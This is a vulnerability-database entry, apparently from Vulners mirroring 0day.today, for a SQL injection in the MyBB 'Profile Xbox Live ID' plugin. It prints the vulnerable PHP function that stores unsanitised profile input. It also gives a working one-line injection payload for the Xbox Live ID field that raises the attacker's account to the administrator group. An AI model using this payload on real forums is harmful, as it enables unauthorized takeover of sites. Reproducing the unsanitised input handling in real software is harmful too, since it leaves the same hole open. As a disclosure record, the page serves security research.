Lucene search
+L

MyBB Profile Xbox Live ID SQL Injection Vulnerability

🗓️ 18 Dec 2012 00:00:00Reported by n3urot0xinType 
zdt
 zdt
🔗 0day.today👁 35 Views

MyBB Profile Xbox Live ID SQL Injection Vulnerability. Exploit allows unauthorized users to become admin. Vendor: http://mods.mybb.com/view/profile-xbox-live-i

Code
Title: MyBB Profile Xbox Live ID SQL Injection
Vendor: http://mods.mybb.com/view/profile-xbox-live-id
Author: Josephvb10
Exploit Author: n3urot0xin

Code:
function profilexli_update($xli)
{
  global $mybb;

  if (isset($mybb->input['xli']))
   {
      $xli->user_update_data['xli'] = $mybb->input['xli'];
   }
}

Become admin (SQLi Ex):
Edit Profile -> XBL ID = x', usergroup='4

#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2012 00:00Current
7High risk
Vulners AI Score7
35